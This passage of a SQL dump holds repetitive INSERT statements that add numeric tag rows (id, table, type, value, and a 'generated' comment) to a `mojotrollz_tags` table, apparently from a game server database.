`table`, `type`, `value`, `comment`) VALUES (2402, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2403, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2403, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2404, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2405, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2406, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2406, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2407, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2407, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2408, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2408, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2409, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2409, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2410, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2410, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2411, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2412, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2413, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2413, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2414, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2414, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2415, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2416, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2416, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2417, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2417, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2418, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2419, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2420, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2420, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2421, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2421, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2422, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2422, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2423, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2427, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2427, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2428, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2429, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2430, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2431, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2432, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2432, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2433, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2435, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2436, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2437, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2438, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2438, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2439, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2439, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2439, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2440, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2440, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2442, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2447, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2447, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2448, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2448, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2449, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2449, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2450, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2451, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2452, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2452, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2453, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2453, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2455, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2456, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2457, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2458, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2458, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2458, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2458, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2459, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2459, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2459, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2459, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2460, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2461, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2462, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2464, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2464, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2465, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2466, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2468, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2468, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2469, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2469, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2470, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2470, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2473, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2473, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2474, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2475, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2476, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2476, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2477, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2477, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2478, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2478, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2480, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2481, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2482, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2483, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2485, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2486, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2487, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2487, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2488, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2488, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2489, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2490, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2491, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2491, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 33, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2493, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2493, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2494, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2495, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2496, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2497, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2497, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2498, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2499, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2500, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2500, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2501, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2502, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2502, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2503, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2503, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2504, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2506, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2507, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2507, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2508, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2509, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2510, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2511, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2511, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2512, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2512, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2513, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2514, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2515, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2515, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2516, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2516, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2517, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2518, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2519, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2519, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2520, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2521, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2522, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2522, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2524, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2525, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2525, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2526, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2526, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2527, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2528, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2528, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2529, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2529, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2529, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2530, 1, 1, 